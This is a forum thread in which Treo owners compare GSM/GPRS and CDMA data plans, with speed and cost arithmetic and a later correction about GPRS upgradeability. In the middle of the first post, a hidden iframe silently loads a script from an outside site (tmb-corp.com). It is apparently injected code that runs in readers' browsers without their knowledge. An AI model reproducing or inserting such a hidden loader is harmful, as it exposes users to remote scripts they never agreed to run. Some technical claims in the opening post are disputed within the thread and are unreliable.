GSRMvsCDMA

many people have been looking at the handsring treo as an upgrade from their i300 or as a step into smartphones all together.

I see that many people have been talking about GPRS.

Unfortunatly the Treo will not support GPRS, Yes the phone will be first available using GSM the global standard for digital cell phones. However the Palm OS does not support GPRS. the treo will still be using the same WAP sysyetm that sprint uses. where data stream takes up your plan minuetes, always from anytime min. not night and weekend. and it also takes time to connect.

So if the treo seems interesting I would wait for the CDMA to be released. The always on connection seems cool however if we should compare.

VoiceStream offers 10MB of download with iStream service for 39.99 per month. (57Kbps)

so we can download all that no matter how long it takes.

Now 3G is supposed to be up to 144Kbps however lets assume you get 100 due to system usage.

10 MB is 80,000 kb

80,000 Kb divided by 100 Kb/s is 800 seconds

800 seconds is equal to 13.33 minuets

So on my 3G phone it would take 13 minutes of down load time to recieve $40 worth of data.

looking at sprint service plans right now by adding 40 to any plan gets aprox. 3000 Minuetes.

Ok lets be fair. lets assume it takes half of the min. to connect and disconnect and reconnect if connection is lost.

thats 1500 minuets at 100Kbps.

so in one months time you could download 150 MB of data for the same price as 10 MB and CDMA runns some where between twice and three times as fast.

Unless you are a world traveler, Be an American and use an All american service CDMA.

By the way CDMA and sprint offer analog roam,

With GSM and Voice stream you get to hike out of the woods when your car breaks down and the only thing that phone can do is help you fend off the bears.<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

Although the Treo only currently supports 14.4 data like the I300, Handspring will be releasing a software upgrade for the Treo to allow it to take advantage of the always-on data capabilities of GPRS, this was a crucial feature HS used to market the product when it was first announced. In fact, the software upgrade is currently being tested with the Treo on Voicestream's GPRS network.

True, while GPRS will only offer 28.8kbps compared to a max of 144kbps for 3G, the Treo is nevertheless upgradeable to GPRS.

Also, even though Sprint offers analog roaming, there have no indications either way if the 3G CDMA Treo will be single or dual-mode. I guess we will just have to wait and see.

I just can see buying a $550 phone that might one day support fact data that will never support analog roam and one day this summer or fall there will be a version is likly to have analog support but defenetly will have some upgrade that might run right might not and will give me the ability to download email for the some of $40 per month, and with sprint I can down load the same data in a mere 92 minutes at 14.4 not counting connect and reconeect time (the reconect time i have only had to do but once or twice the whole time I have been with sprint) so even if it takes 120 phone min. to down load 10MB of data 40/month gets well over 300 anytime min or more added to any SprintPCS plan.

then when 3G is available (and we assume that it getts 100Kbps) well slower than the designed 144 ) then it would take 13.3 min to download if we assume an equal amount of time to connect (Highly Unlikly) that 26min. again I remind you that the extra $40 month gets more than 300 min. extra, enough time to download some where between 100-200MB of data depenbding on the amount of time spent connecting to the web. aprox 45 seconds. each time.

I sell GPRS and I will tell you how its great at the store, only because I get a $50 check from Voice stream for each new phone activation with istream service.

However I will Stand buy the fact that CDMA is a far better technology and you can take your GMS and your Euros back to the old country if you dont like the all american cell phone system. LOL

There's no need to get testy. You are barking up the wrong tree here. No one here is questioning your data rate/time calculations. To be honest, I really don't care because those numbers are just estimates and we won't know anything for sure until the system is actually launched. And even at that, connection speeds will vary greatly depending on a multitude of factors. I do, however, totally agree that CDMA is superior to GSM. In fact, considering that almost everyone here uses Sprint, I would venture to guess that a lot of people here would agree as well. I was simply correcting your error that the Treo 180 will not be upgradeable to GPRS. The one thing I enjoy most about this forum compared to the others I participate on is the knowledge that we can discuss rival products/systems here without getting into a flame war about which is better. Calm down, we're all I300/CDMA users here...

Marty

P.S. some punctuation would make your posts much easier to follow, especially in that first paragraph

Sorry Not trying to be testy, Or trying to start some war, just putting some of my thoughts down, The part you quoted was meant as a joke.
